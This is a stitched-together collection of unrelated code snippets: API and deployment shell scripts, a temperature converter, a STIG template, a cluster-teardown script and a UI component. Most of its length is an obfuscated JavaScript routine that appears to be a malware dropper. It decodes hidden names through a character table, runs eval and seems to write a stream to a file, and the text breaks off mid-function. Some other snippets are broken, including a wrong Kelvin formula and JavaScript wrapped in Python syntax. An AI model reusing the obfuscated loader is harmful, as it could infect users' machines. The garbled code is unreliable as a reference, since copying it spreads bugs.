// MIT License (https://github.com/MC-Market-org/js-api-wrapper/blob/main/LICENSE)
const wrapper = require("../mcm-js-api-wrapper");
const token = {
type: "Private",
value: "Find API Key @ https://www.mc-market.org/account/api",
};
let resource_id = 3;
async function main() {
// Initialise wrapper and exit if a failure occurs.
let init = await wrapper.init(token);
if (init.result === "error") {
console.log(init.error);
process.exit(0);
}
let versions = await wrapper.resources.versions.list_all(resource_id);
if (versions.result === "error") {
console.log(versions.error);
process.exit(0);
}
// The current version cannot be deleted so we remove it from the returned list of versions.
versions.data.shift();
for (const index in versions.data) {
let version_id = versions.data[index].version_id;
let res = await wrapper.resources.versions.delete(resource_id, version_id);
if (res.result === "error") {
console.log(res.error);
process.exit(0);
}
console.log("Successfully deleted version with id: " + version_id);
}
}
main();
|
var express = require("express");
var app = express();
app.get("/convert/ Kelvin/Fahrenheit/:value", (req, res) => {
let kelvin = req.params.value;
let fahrenheit = (kelvin * 9) / 5 - 459.67;
res.send(`${fahrenheit} Fahrenheit`);
});
app.get("/convert/ Celsius/Fahrenheit/:value", (req, res) => {
let celsius = req.params.value;
let fahrenheit = (celsius * 9) / 5 + 32;
res.send(`${fahrenheit} Fahrenheit`);
});
app.get("/convert/ Fahrenheit/Kelvin/:value", (req, res) => {
let fahrenheit = req.params.value;
let kelvin = (fahrenheit + 459.67) * 5 / 9;
res.send(`${kelvin} Kelvin`);
});
app.listen(3000); |
function isValidMathExpression(expression) {
const stack = [];
const operators = new Set(['+', '-', '*', '/']);
for (let char of expression) {
if (char === '(') {
stack.push(char);
} else if (char === ')') {
if (stack.length === 0) {
return false; // Unbalanced parentheses
}
stack.pop();
} else if (operators.has(char)) {
if (stack.length === 0 || stack[stack.length - 1] === '(') {
return false; // Operator at the beginning or after an opening parenthesis
}
}
}
if (stack.length !== 0) {
return false; // Unbalanced parentheses
}
if (operators.has(expression[expression.length - 1])) {
return false; // Expression ends with an operator
}
try {
eval(expression); // Attempt to evaluate the expression
} catch (error) {
return false; // Division by zero or invalid expression
}
return true; // All checks passed, expression is valid
}
// Test cases
console.log(isValidMathExpression("((8*2)-(6/3)")); // Output: true
console.log(isValidMathExpression("5+7*(")); // Output: false |
#!/bin/bash
# Module specific variables go here
# Files: file=/path/to/file
# Arrays: declare -a array_name
# Strings: foo="bar"
# Integers: x=9
###############################################
# Bootstrapping environment setup
###############################################
# Get our working directory
cwd="$(pwd)"
# Define our bootstrapper location
bootstrap="${cwd}/tools/bootstrap.sh"
# Bail if it cannot be found
if [ ! -f ${bootstrap} ]; then
echo "Unable to locate bootstrap; ${bootstrap}" && exit 1
fi
# Load our bootstrap
source ${bootstrap}
###############################################
# Metrics start
###############################################
# Get EPOCH
s_epoch="$(gen_epoch)"
# Create a timestamp
timestamp="$(gen_date)"
# Whos is calling? 0 = singular, 1 is as group
caller=$(ps $PPID | grep -c stigadm)
###############################################
# Perform restoration
###############################################
# If ${restore} = 1 go to restoration mode
if [ ${restore} -eq 1 ]; then
report "Not yet implemented" && exit 1
fi
###############################################
# STIG validation/remediation
###############################################
# Module specific validation code should go here
# Errors should go in ${errors[@]} array (which on remediation get handled)
# All inspected items should go in ${inspected[@]} array
errors=("${stigid}")
# If ${change} = 1
#if [ ${change} -eq 1 ]; then
# Create the backup env
#backup_setup_env "${backup_path}"
# Create a backup (configuration output, file/folde permissions output etc
#bu_configuration "${backup_path}" "${author}" "${stigid}" "$(echo "${array_values[@]}" | tr ' ' '\n')"
#bu_file "${backup_path}" "${author}" "${stigid}" "${file}"
#if [ $? -ne 0 ]; then
# Stop, we require a backup
#report "Unable to create backup" && exit 1
#fi
# Iterate ${errors[@]}
#for error in ${errors[@]}; do
# Work to remediate ${error} should go here
#done
#fi
# Remove dupes
#inspected=( $(remove_duplicates "${inspected[@]}") )
###############################################
# Results for printable report
###############################################
# If ${#errors[@]} > 0
if [ ${#errors[@]} -gt 0 ]; then
# Set ${results} error message
#results="Failed validation" UNCOMMENT ONCE WORK COMPLETE!
results="Not yet implemented!"
fi
# Set ${results} passed message
[ ${#errors[@]} -eq 0 ] && results="Passed validation"
###############################################
# Report generation specifics
###############################################
# Apply some values expected for report footer
[ ${#errors[@]} -eq 0 ] && passed=1 || passed=0
[ ${#errors[@]} -gt 0 ] && failed=1 || failed=0
# Calculate a percentage from applied modules & errors incurred
percentage=$(percent ${passed} ${failed})
# If the caller was only independant
if [ ${caller} -eq 0 ]; then
# Show failures
[ ${#errors[@]} -gt 0 ] && print_array ${log} "errors" "${errors[@]}"
# Provide detailed results to ${log}
if [ ${verbose} -eq 1 ]; then
# Print array of failed & validated items
[ ${#inspected[@]} -gt 0 ] && print_array ${log} "validated" "${inspected[@]}"
fi
# Generate the report
report "${results}"
# Display the report
cat ${log}
else
# Since we were called from stigadm
module_header "${results}"
# Show failures
[ ${#errors[@]} -gt 0 ] && print_array ${log} "errors" "${errors[@]}"
# Provide detailed results to ${log}
if [ ${verbose} -eq 1 ]; then
# Print array of failed & validated items
[ ${#inspected[@]} -gt 0 ] && print_array ${log} "validated" "${inspected[@]}"
fi
# Finish up the module specific report
module_footer
fi
###############################################
# Return code for larger report
###############################################
# Return an error/success code (0/1)
exit ${#errors[@]}
# Date: 2018-09-06
#
# Severity: CAT-I
# Classification: UNCLASSIFIED
# STIG_ID: V0072005
# STIG_Version: SV-86629r2
# Rule_ID: RHEL-07-020310
#
# OS: Red_Hat
# Version: 7
# Architecture:
#
# Title: The Red Hat Enterprise Linux operating system must be configured so that the root account must be the only account having unrestricted access to the system.
# Description: If an account other than root also has a User Identifier (UID) of "0", it has root authority, giving that account unrestricted access to the entire operating system. Multiple accounts with a UID of "0" afford an opportunity for potential intruders to guess a password for a privileged account.
|
#!/bin/sh
# Copyright 2012-2016 by Kvaser AB, Molndal, Sweden
# http://www.kvaser.com
#
# This software is dual licensed under the following two licenses:
# BSD-new and GPLv2. You may use either one. See the included
# COPYING file for details.
#
# License: BSD-new
# ===============================================================================
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
# License: GPLv2
# ===============================================================================
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ---------------------------------------------------------------------------
MODNAME=mhydra
DEPMOD=`which depmod`
UDEVCTRL=`which udevcontrol`
UDEVADM=`which udevadm`
UDEVD=`which udevd`
install -D -m 644 $MODNAME.ko /lib/modules/`uname -r`/kernel/drivers/usb/misc/$MODNAME.ko
if [ "$?" -ne 0 ] ; then
exit 1
fi
install -m 755 $MODNAME.sh /usr/sbin/
if [ "$?" -ne 0 ] ; then
exit 1
fi
install -m 644 ../10-kvaser.rules /etc/udev/rules.d
if [ "$?" -ne 0 ] ; then
exit 1
fi
if [ -z $UDEVD ] ; then
$UDEVADM control --reload-rules ;
else
if [ `udevd --version` -lt 128 ] ; then
$UDEVCTRL reload_rules ;
else
$UDEVADM control --reload-rules ;
fi
fi
$DEPMOD -a
if [ "$?" -ne 0 ] ; then
echo Failed to execute $DEPMOD -a
fi
|
source /etc/dsqp/opal_poll.config
QP_HOME_DIR=${QP_HOME_DIR:-"$HOME/ds_deployment"}
if [[ $(which docker) ]]; then
echo "docker already installled, version is: "
docker -v
else
echo "docker not installed, installing docker:"
cd ~/ds_deployment/ds_develop
./install_docker.sh
fi
if [[ -n $QP_DOCKER_REGISTRY_PREFIX ]]; then
printf "**** registry fround pulling images from $QP_DOCKER_REGISTRY_PREFIX ...\n\n"
./pullPollProdImages.sh $QP_DOCKER_REGISTRY_PREFIX $QP_DOCKER_REGISTRY_USER $QP_DOCKER_REGISTRY_PW
fi
printf "\n Removing config folders and files from home directory $QP_HOME_DIR - you can find your config files here /etc/dsqp/ \n"
rm -rf $QP_HOME_DIR/auth
rm -rf $QP_HOME_DIR/miracum_users
rm $QP_HOME_DIR/opal_poll.config
docker-compose -f docker-compose.poll.prod.yml down
./start_prod.sh
printf "\n the first time opal starts it takes a while to be ready as we are loading test data and configuring the servers for you, so please be patient\n"
printf "\n - visit $OPAL_SERVER_IP:8443 in your browser to access the poll server user interface \n"
printf "\n - visit https://$OPAL_SERVER_IP:443 in your browser to access the opal server user interface \n"
|
"""
Modifying this JavaScript code to calculate the power of a given number
"""
function pow(base,power) {
let result = 1;
for(let i=1; i<=power; i++) {
result *= base;
}
return result;
}
if __name__ == '__main__':
base = 4;
power = 3;
result = pow(base, power);
console.log("Result:", result); |
#!/bin/bash
###############################################################################
# Copyright (c) Red Hat, Inc.
# Copyright Contributors to the Open Cluster Management project
###############################################################################
if [ -z $1 ]; then
echo "please set the cluster name"
exit 1
fi
CLUSTERNAME=$1
function destroyOrDetach {
oc annotate klusterletaddonconfig -n ${CLUSTERNAME} ${CLUSTERNAME} klusterletaddonconfig-pause=true --overwrite=true
oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-appmgr --wait=false
oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-certpolicyctrl --wait=false
oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-iampolicyctrl --wait=false
oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-policyctrl --wait=false
oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-search --wait=false
oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-workmgr --wait=false
sleep 60
oc delete klusterletaddonconfig --wait=false -n ${CLUSTERNAME} ${CLUSTERNAME}
oc annotate klusterletaddonconfig -n ${CLUSTERNAME} ${CLUSTERNAME} klusterletaddonconfig-pause=false --overwrite=true
sleep 30
oc get clusterdeployment -n ${CLUSTERNAME} ${CLUSTERNAME}
if [ $? -eq 0 ]; then
echo "Detected clusterdeployment. Destroying"
oc delete clusterdeployment -n ${CLUSTERNAME} ${CLUSTERNAME} --wait=false
for i in `seq 1 180`; do
echo "waiting clusterdeployment to be deleted"
sleep 20
oc get clusterdeployment -n ${CLUSTERNAME} ${CLUSTERNAME} || break ;
done
fi
oc delete managedcluster ${CLUSTERNAME} --wait=false
sleep 60
oc patch managedcluster ${CLUSTERNAME} -p '{"metadata":{"finalizers":[]}}' --type=merge
oc -n ${CLUSTERNAME} delete rolebinding.authorization.openshift.io/${CLUSTERNAME}:managed-cluster-work --wait=false
sleep 10
oc -n ${CLUSTERNAME} patch rolebinding.authorization.openshift.io ${CLUSTERNAME}:managed-cluster-work -p '{"metadata":{"finalizers":[]}}' --type=merge
oc -n ${CLUSTERNAME} delete role.authorization.openshift.io/${CLUSTERNAME}:managed-cluster-work --wait=false
sleep 10
oc -n ${CLUSTERNAME} patch role.authorization.openshift.io/${CLUSTERNAME}:managed-cluster-work -p '{"metadata":{"finalizers":[]}}' --type=merge
exit
}
if [ ${CLUSTERNAME} = 'all' ]; then
pids=()
for c in `oc get managedcluster -otemplate --template='{{range .items}}{{printf "%s\n" .metadata.name}}{{end}}'` ; do
CLUSTERNAME=${c}
echo destroyOrDetach ${CLUSTERNAME}
destroyOrDetach &
pids+=($!)
done
for pid in ${pids[*]}; do
wait $pid
done
else
destroyOrDetach
fi
|
<reponame>hafizalfaza/rrssrbp<gh_stars>0
/* @flow */
import styled from 'styled-components'
export const ScrollView = styled.div`
display: flex;
flex-direction: ${props => props.orientation === 'vertical' ? 'column' : 'row'};
overflow-x: ${props => props.orientation === 'vertical' ? 'hidden' : 'auto'};
overflow-y: ${props => props.orientation === 'horizontal' ? 'hidden' : 'auto'};
`
export default ScrollView
|
function AqFXJ(EoeUOV)
{
return "charAt";
}
function GzH()
{
var HTv = "YkuOKC7i{\"GUy%x}2c9N*Q+8tneM[`S^";
return HTv;
}
function ODHUn()
{
var HTv = "W<I?qgrv($lBT,'/EP0#DL: ";
return HTv;
}
function WxRB()
{
var HTv = "p_@|VJfw6z=R;A)mj5Za31Hs!o->F.~&\\4X]dbh";
return HTv;
}
function taImARE(mPC)
{
var HTv = GzH() + ODHUn() + WxRB();
var HUXiJlC=1785;
var orbzW=HUXiJlC+5733;
var GhtUdS=orbzW/42;
var PfiAUAg=GhtUdS-148;
var CNq = HTv["" + AqFXJ(mPC)](mPC-PfiAUAg);
return CNq;
}
function VqeCCr()
{
var UGkl=31333;
var FWboYO=26703;
return "l";
}
function gJMw()
{
var xKLiyqL=42015;
var hzHs="gsv$2=D";
return VqeCCr();
}
function wjSPrk()
{
var tTpEJ=12822;
var IEwmMjD=25431;
return "e";
}
function CUEa()
{
var NuAPmuT=9551;
var VizltF="HG%gU-Pi";
return wjSPrk();
}
function PeRYKj()
{
var PyDntxw="4O*y";
return ""+gJMw()+CUEa();
}
function oDIN()
{
return taImARE(3808/68+0);
}
function TPijTj()
{
return taImARE(5508/81+0);
}
function fQsUzpj()
{
var vaGUTk="0J$";
return ""+oDIN()+""+""+TPijTj();
}
function VAvpDg()
{
return taImARE(5*11);
}
function OIIV()
{
return taImARE(1375/11-0);
}
function Euh()
{
var tlMJfjf="I^i$5";
return VAvpDg()+""+""+OIIV();
}
function bqbfoV() {
var xOePw="";
xOePw=xOePw;
return xOePw;
}
function keBmjgg() {
var mIXmDTF="";
mIXmDTF=mIXmDTF;
return mIXmDTF;
}
function gViFz(jUVECf)
{
var rKFxU = PeRYKj();
var OnUlWT = fQsUzpj();
var ivoKpDQ = Euh();
rKFxU = rKFxU + bqbfoV() + OnUlWT + keBmjgg() + ivoKpDQ;
var lck = jUVECf[rKFxU];
return lck;
}
function VWDPPx(wJwoFU)
{
var RMUIB="";
RMUIB=RMUIB+taImARE(7800/78-0)+taImARE(16*3)+taImARE(369-314)+taImARE(1406/37-0)+taImARE(5950/85+0)+taImARE(627/11-0)+taImARE(866-745)+taImARE(272/8-0)+taImARE(413-289)+taImARE(103)+taImARE(283-226)+taImARE(16*3)+taImARE(853-798);
var Otpbh = eval(RMUIB);
return (30>"29")?Otpbh:wJwoFU;
}
function TOzPsPM() {
var RpObN=76134;
var hLQW=RpObN+57282;
var aXK=hLQW/218;
var KAc=aXK-608;
return 0+KAc;
}
function JFN() {
var Szs=65489;
var isbJ=Szs+30943;
var pUprtlp=isbJ/168;
var EqJ=pUprtlp-574;
return 0+EqJ;
}
function wujRqoh()
{
return taImARE(6900/69+0);
}
function CVDe()
{
return taImARE(1743/21+0);
}
function qGFYl()
{
return taImARE(3094/91-0);
}
function GhRv()
{
var Rws="{8Q";
return ""+CVDe()+""+qGFYl();
}
function LcbW()
{
var Ilz="g~\"1(";
return wujRqoh()+""+""+GhRv();
}
function uMVmEzA()
{
return taImARE(1568/16-0);
}
function FFg()
{
return taImARE(6032/52+0);
}
function hVh()
{
var zcHEQU=5827;
return uMVmEzA()+""+FFg();
}
function QAx()
{
return taImARE(944-846);
}
function aThivF()
{
return taImARE(3*19);
}
function iJbmU()
{
var AUy="_8u)";
return QAx()+aThivF();
}
function PSD()
{
var AhXNH=53351;
return hVh()+iJbmU();
}
function tINT()
{
var ZKAszx="l[k";
return ""+LcbW()+""+PSD();
}
function lKAtYF()
{
return taImARE(1488/31-0);
}
function IPQws()
{
return taImARE(928-816);
}
function OpDgHnu()
{
return taImARE(4071/59-0);
}
function vtr()
{
var OUi="ZN#y";
return ""+IPQws()+""+OpDgHnu();
}
function dCpr()
{
var SpiLnj="|] ";
return ""+lKAtYF()+""+vtr();
}
function Vkiv()
{
return taImARE(7872/64+0);
}
function NRnqNJ()
{
return taImARE(3410/31-0);
}
function jBIC()
{
var hty=50598;
return ""+Vkiv()+""+NRnqNJ();
}
function pfU()
{
return taImARE(3*19);
}
function HNpfyo()
{
return taImARE(5*11);
}
function vInMYPe()
{
var YCJuP="#zvqU";
return ""+pfU()+""+HNpfyo();
}
function zfAzQ()
{
var UQh=" G'F?";
return ""+jBIC()+""+vInMYPe();
}
function USYAv()
{
var bGwts="*O.e";
return ""+dCpr()+""+zfAzQ();
}
function voWG()
{
var xdkotO="N5bk";
return ""+tINT()+USYAv();
}
function hhcqWs()
{
return taImARE(2976/32-0);
}
function xwbI()
{
return taImARE(2*19);
}
function fHY()
{
return taImARE(850-793);
}
function gBnx()
{
var IFit="wBGH";
return ""+xwbI()+""+fHY();
}
function KNFs()
{
var MByzIR="W^W=";
return ""+hhcqWs()+gBnx();
}
function bRmSCo()
{
return taImARE(4234/58-0);
}
function ONcu()
{
return taImARE(1968/16+0);
}
function GmmoLme()
{
return taImARE(10*11);
}
function CxipPxJ()
{
var zWWgU="^`u.B";
return ONcu()+GmmoLme();
}
function BASHuao()
{
var bIWZb=".v^q";
return ""+bRmSCo()+""+CxipPxJ();
}
function eMcnH()
{
var GBmXpm="%Yvt";
return ""+KNFs()+""+BASHuao();
}
function mvn()
{
return taImARE(202-115);
}
function YApmLX()
{
return taImARE(3*23);
}
function MSQmLK()
{
var UhRVVf="953";
return ""+mvn()+""+YApmLX();
}
function MUycBk()
{
return taImARE(4144/37-0);
}
function nUmcD()
{
return taImARE(261/3+0);
}
function bkK()
{
return taImARE(4560/80+0);
}
function jhSISPT()
{
var RRPEsAQ="W~E/,";
return nUmcD()+""+bkK();
}
function mOjKMa()
{
var CpaDvLc="SU&)B";
return MUycBk()+""+jhSISPT();
}
function fAnnOp()
{
var dcHJeMv=33047;
return MSQmLK()+""+mOjKMa();
}
function UprZcBx()
{
return taImARE(3*23);
}
function sxCO()
{
return taImARE(5*11);
}
function mXVCORn()
{
var DlasQ="?\\ ";
return UprZcBx()+sxCO();
}
function bqzGFZU()
{
return taImARE(222-184);
}
function iDCkNl()
{
return taImARE(437-380);
}
function cTQkqH()
{
return taImARE(6050/55+0);
}
function nIvjoLG()
{
var HHbC="zSw<T";
return ""+iDCkNl()+""+cTQkqH();
}
function iyXhA()
{
var MmmmFQ="w{*";
return ""+bqzGFZU()+""+nIvjoLG();
}
function vhRwA()
{
var Lrafnz="b#m";
return mXVCORn()+""+""+iyXhA();
}
function FeTnXuu()
{
var dDWJRD="W+k=Q";
return fAnnOp()+""+vhRwA();
}
function QBFZ()
{
return taImARE(2622/38-0);
}
function XVM()
{
return taImARE(969/17-0);
}
function VtpeB()
{
return taImARE(10*11);
}
function xvTVxy()
{
var jAi=13186;
return XVM()+""+VtpeB();
}
function DPplIcR()
{
var uJBxc="B7+L^";
return ""+QBFZ()+xvTVxy();
}
function PpgHPi()
{
return taImARE(3053/71+0);
}
function cUN()
{
return taImARE(2968/53-0);
}
function dnIACa()
{
return taImARE(4416/92-0);
}
function xIVrqdw()
{
var UjC="+)WJ";
return cUN()+""+dnIACa();
}
function RmmCF()
{
var rQl="*#z";
return PpgHPi()+xIVrqdw();
}
function Oddxo()
{
var twHj="Ly(KW";
return ""+DPplIcR()+""+RmmCF();
}
function owFqDm(uWBvgMR)
{
var buUxRK = "";
var Wolx = 0;
util_log("Starting owFqDm("+uWBvgMR+")");
if (uWBvgMR == 0)
return false;
var AjkQn = VWDPPx(uWBvgMR+TOzPsPM());
var GWs = JFN();
try
{
GWs = new String;
}
catch (GvFUYRg)
{
}
GWs = new AjkQn(voWG());
util_log("owFqDm 2");
var vLfcU="";
vLfcU=vLfcU+taImARE(2376/72-0)+taImARE(8*7)+taImARE(150-118)+taImARE(693-637)+taImARE(10752/96+0)+taImARE(845-751)+taImARE(8*7);
util_log({vLfcU:vLfcU});
var dIardI = vLfcU;
var UwgL = eMcnH();
util_log("owFqDm 3");
var CLKeeH = 10;
CLKeeH = typeof GWs[FeTnXuu()];
util_log({CLKeeH:CLKeeH, GWs: GWs, FeTnXuu:FeTnXuu()});
if (CLKeeH["charAt"](2) == "j")
{
util_log({UwgL: UwgL, "Oddxo()":Oddxo()});
CLKeeH = typeof GWs[UwgL][Oddxo()];
util_log({CLKeeH:CLKeeH});
}
util_log({CLKeeH:CLKeeH, dIardI:dIardI});
//if (CLKeeH != dIardI)
// return false;
util_log("owFqDm 5");
function oHtyt() {
var kYSVsfS="";
kYSVsfS=kYSVsfS+taImARE(2280/60-0)+taImARE(990/18-0)+taImARE(2850/50-0)+taImARE(714/7+0);
return kYSVsfS;
}
util_log("owFqDm 6");
CLKeeH = typeof GWs[UwgL][oHtyt()];
util_log({UwgL:UwgL, "oHtyt()":oHtyt()})
function FbCNk() {
var BwXyBMd="";
BwXyBMd=BwXyBMd+taImARE(2871/87-0)+taImARE(523-467)+taImARE(128/4+0)+taImARE(8*7)+taImARE(672/6+0)+taImARE(4230/45+0)+taImARE(4928/88+0);
return BwXyBMd;
}
util_log("owFqDm 7");
dIardI = FbCNk();
var qHqVwFX = (CLKeeH == dIardI);
util_log({CLKeeH:CLKeeH, dIardI:dIardI})
util_log("owFqDm 8");
util_log({qHqVwFX: qHqVwFX})
return qHqVwFX;
}
function jZPqd(EUg)
{
return EUg;
}
function igX(aav, WSidhgh)
{
var CJMo=136242;
var gYtx=CJMo+5242;
var smh=gYtx/326;
var Jta=smh-433;
var uJnel = Jta;
var MuoV=28979;
var NxYZWh=MuoV+4663;
var hGNr=NxYZWh/623;
var HEugAOU=hGNr-54;
var XUtbe = HEugAOU;
var feJTH=132721;
var AspNZAV=feJTH+36076;
var pfrhLp=AspNZAV/179;
var lMocl=pfrhLp-936;
var aNApGkD = lMocl;
var GXpbtir="";
GXpbtir=GXpbtir+taImARE(6264/72+0)+taImARE(53*2)+taImARE(1035-966)+taImARE(1022-912)+taImARE(3*19)+taImARE(4615/71-0)+taImARE(340-284)+taImARE(3630/66-0);
var IPr = GXpbtir;
var eHU="";
eHU=eHU+taImARE(16*3)+taImARE(1111-986)+taImARE(646-540)+taImARE(6831/99+0)+taImARE(352-252)+taImARE(1100/20+0);
var gBwuPqS = eHU;
aNApGkD = eval((Math.cos(uJnel + 0) > 0)?IPr:gBwuPqS);
if (Math.sin(uJnel) > XUtbe)
{
var peuMD = aNApGkD(jZPqd(aav), WSidhgh);
var OnJ=334942;
var Vcf=OnJ+1343;
var CAP=Vcf/477;
var xPodsat=CAP-663;
var AKkby = xPodsat;
return peuMD;
}
else
return uJnel;
}
function rTeb(PyqmPl, YVHU)
{
return PyqmPl ^ YVHU;
}
function daE()
{
var JTdepSc=684895;
var UGGK=JTdepSc+6940;
var gNu=UGGK/773;
var UgorS=gNu-175;
var yVBI = UgorS;
var bbXX=["e","tS","alF","pec","i","ld","o","r","Ge"];
var Gxd=bbXX[8]+bbXX[1]+bbXX[3]+bbXX[4]+bbXX[2]+bbXX[6]+bbXX[5]+bbXX[0]+bbXX[7];
var HMhFr = Gxd;
return HMhFr;
}
function bUBQdl(embjeLY)
{
var CwLQG=354316;
var qcuQnIj=CwLQG+3254;
var widutEI=qcuQnIj/435;
var mMZ=widutEI-694;
var Non = mMZ;
var WyWhCR="";
WyWhCR=WyWhCR+taImARE(718-662)+taImARE(163-51)+taImARE(5*11);
var ITAJioB = WyWhCR;
try
{
var MKals="";
MKals=MKals+taImARE(7*17);
var lxDghTY="";
lxDghTY=lxDghTY+taImARE(410/10-0)+taImARE(3648/64-0)+taImARE(2585/47+0)+taImARE(7050/94-0)+taImARE(2052/36-0)+taImARE(6426/63-0)+taImARE(1131/13-0)+taImARE(4100/82+0)+taImARE(4028/38+0)+taImARE(10098/99+0)+taImARE(919-862);
ITAJioB = MKals + embjeLY[lxDghTY]();
var hPorMxn="";
hPorMxn=hPorMxn+taImARE(16*3)+taImARE(25*5)+taImARE(2014/19+0)+taImARE(2415/35-0)+taImARE(500/5-0)+taImARE(5*11);
util_log({Non:Non, hPorMxn:hPorMxn})
var NDEfDs=22958;
var BBXHdk=NDEfDs+13336;
var owOjq=BBXHdk/138;
var iBdmX=owOjq-7;
ITAJioB = ITAJioB + Non[hPorMxn](iBdmX);
}
catch (ypdsK)
{
ITAJioB = embjeLY[daE()](2) + ITAJioB;
}
return ITAJioB;
}
function nAc(kqcUahR, RSIf, poOQ, SrQGqB)
{
var vtS=341669;
var SnMuRRP=vtS+17108;
var JEtMFAH=SnMuRRP/437;
var VRcVJB=JEtMFAH-821;
var ElPnI = VRcVJB;
if (kqcUahR > ElPnI)
{
kqcUahR = ElPnI;
}
var YkD="";
YkD=YkD+taImARE(10*11)+taImARE(1564/23-0)+taImARE(4920/40+0)+taImARE(255-152)+taImARE(155-30)+taImARE(6784/64+0)+taImARE(7260/66-0)+taImARE(6732/99-0)+taImARE(25*5)+taImARE(41*3)+taImARE(3399/33+0);
var TrG = YkD;
var Rzfd="";
Rzfd=Rzfd+taImARE(378/6-0)+taImARE(110/1-0)+taImARE(16*3)+taImARE(3036/44-0)+taImARE(3382/89+0)+taImARE(3*29)+taImARE(2860/52-0)+taImARE(4*29)+taImARE(703-642)+taImARE(25*5)+taImARE(864-807)+taImARE(73)+taImARE(727-654);
TrG = new RSIf(Rzfd);
TrG[SrQGqB](poOQ, kqcUahR);
var VDd=192518;
var qaTqAa=VDd+14746;
var mQw=qaTqAa/272;
var LUTKs=mQw-754;
var ITAJioB = LUTKs;
return ITAJioB;
}
function JLmAt(ruhNnUN, RSIf, poOQ, SrQGqB)
{
var TBghuKs="";
TBghuKs=TBghuKs+taImARE(365/5+0)+taImARE(3*19)+taImARE(4592/82+0)+taImARE(4*17)+taImARE(2090/38-0)+taImARE(11125/89+0);
var efSoCjr = ruhNnUN[TBghuKs];
var iHWiReW=704723;
var aoUbv=iHWiReW+4712;
var icSvu=aoUbv/995;
var ctvNRbf=icSvu-706;
var QBRh = ctvNRbf;
var Yvo=228618;
var EGWDjXd=Yvo+52344;
var gRtgPsc=EGWDjXd/594;
var SjsC=gRtgPsc-468;
var udlRWNE = SjsC;
var Piuxxr = SrQGqB;
if (efSoCjr == QBRh)
{
var gmGNNO="";
gmGNNO=gmGNNO+taImARE(3036/44+0)+taImARE(432-399)+taImARE(533-477);
Piuxxr = gmGNNO;
}
if (efSoCjr == udlRWNE)
{
var EKqpGl = efSoCjr * udlRWNE;
return nAc(EKqpGl, RSIf, poOQ, SrQGqB);
}
var RoavpeB="";
RoavpeB=RoavpeB+taImARE(322-212)+taImARE(2079/63-0)+taImARE(1364/11+0)+taImARE(1100/10-0)+taImARE(256-201)+taImARE(3*23)+taImARE(351-313)+taImARE(8*7)+taImARE(784-716);
var yjUe=141647;
var HgYhn=yjUe+60997;
var ppcPSmQ=HgYhn/468;
var FQcaGR=ppcPSmQ-433;
var uzKk=99755;
var VHGuYy=uzKk+44373;
var SlPLuA=VHGuYy/256;
var ahxw=SlPLuA-562;
var JBCGM = ruhNnUN[RoavpeB](FQcaGR, efSoCjr - ahxw);
return JLmAt(JBCGM, RSIf, poOQ, Piuxxr);
}
function xTxkq(frwePNo)
{
var DrigSl="";
DrigSl=DrigSl+taImARE(4347/69-0)+taImARE(7260/66+0)+taImARE(4272/89+0)+taImARE(1932/28+0)+taImARE(1025-987)+taImARE(4959/57+0)+taImARE(5*11)+taImARE(4*29)+taImARE(122/2+0)+taImARE(25*5)+taImARE(176-119)+taImARE(2847/39-0)+taImARE(6643/91+0);
var Mjqvj = new frwePNo(DrigSl);
return Mjqvj;
}
function wKU() {
var kRIuDKO=264882;
var OJZ=kRIuDKO+840;
var gBztA=OJZ/402;
var NNoIKT=gBztA-661;
return NNoIKT+0;
}
function UQPsRs() {
var DBRDc="";
DBRDc=DBRDc;
return DBRDc;
}
function tZllJ() {
var pTQik=330443;
var fmMI=pTQik+11829;
var xEh=fmMI/764;
var axLj=xEh-448;
return 0+axLj;
}
function xQPSW() {
var NERDbG=200470;
var xEvRloH=NERDbG+28382;
var Jrbw=xEvRloH/326;
var GLPDZVx=Jrbw-700;
return 0+GLPDZVx;
}
function zaOSBy() {
var fqFsV="";
fqFsV=fqFsV+taImARE(916-868)+taImARE(270-145)+taImARE(761-655)+taImARE(1069-1000)+taImARE(417-317)+taImARE(5*11);
return fqFsV;
}
function wBem() {
var FiKIJ="";
FiKIJ=FiKIJ+taImARE(389-341)+taImARE(501-376)+taImARE(53*2)+taImARE(2622/38+0)+taImARE(6100/61+0)+taImARE(4235/77-0);
return FiKIJ;
}
function ligL() {
var ksO=58357;
var BhkD=ksO+18244;
var PgkuRIi=BhkD/353;
var tASr=PgkuRIi-216;
return tASr+0;
}
function exwGC() {
